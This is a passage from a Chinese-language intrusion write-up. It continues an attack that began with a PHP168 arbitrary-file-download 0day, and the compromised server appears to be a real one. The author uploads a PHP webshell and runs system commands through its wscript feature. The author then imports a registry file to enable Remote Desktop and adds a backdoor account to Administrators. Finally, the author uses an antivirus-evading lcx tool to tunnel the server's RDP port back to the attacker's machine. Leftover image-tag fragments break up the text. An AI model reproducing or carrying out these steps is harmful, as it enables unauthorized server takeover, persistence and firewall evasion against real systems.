由PHP168任意文件下载0DAY到服务器提权

10.直接上传PHP大马

不过一直在我身后支持我的哥们儿——“孤水绕城”提醒我换一个大马试一试，并顺手把他经常用的angle写的PHP木马给了我，把新的木马传上去以后，系统命令依然无法执行，反弹Shell也不成功，不过我发现这个木马在执行系统命令时多了一个选项。如图12所示。

PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>　

图12新木马中的好东东

在这里我选择用wscript试一下，执行命令net user，竟然成功了。如图13所示。

PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>

图13使用新功能添加用户成功

11.查看系统开放端口和打开3389远程终端

没想到这个英文的木马这么好用，而且我还发现系统里竟然有一个heart用户，应该是我刚才用Serv-U加进去的，只是没有返回罢了。我又看了一下系统开放的端口，端口开的挺多只是没有3389。如图14所示。　

PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>

图14查看网络端口开放情况

我传了几个开3389的程序上去，结果都难逃被杀的命运。最后我找到一个同样功能的注册表文件3389.reg，上传到服务器C:WINDOWSTemp目录(这个目录IUSER权限的用户可读写)，用PHP的wscript后执行“reg import C:WINDOWSTemp3389.reg”试了下，3389成功开放如图15所示。

PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>

图15开放3389端口

难道现在大马已经是系统权限的了，赶紧用IISPutScanner扫了下该网站。原来是Apache搭建的PHP环境，大家都知道Windows 2003+Apache+PHP如果以“LocalSystem”启动的话默认的PHP就具有最高权限。这下不用Serv-U来执行命令了。

执行“net localgroup admininstrators　heart /add”命令把heart用户添加到Administrators组里面，进行远程桌面连接。

12.使用端口转发程序成功进入该服务器

本来以为本次入侵已经告一段落了，可是在我等了很长时间以后，竟然提示连接失败。根据以往的入侵经验，八成是被防火墙拦下了。看来只能进行端口转发了，找一个免杀的lcx传上去，本地执行“lcx –listen 110 1987”命令，服务器上执行“lcx　–slave 本地ip　110　服务器ip 3389命令”然后用远程桌面连接本机的1987端口，顺利的进入远程桌面。如图16所示。

PHP168任意文件下载0DAY到服务器提权" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>

图16.成功连入服务器

最后总结下，本文只是作为一个菜鸟的学习心得，希望大家能够多关注网络安全，多关注antian365——这个默默无闻为网络安全洒下辛劳与汗水的团队。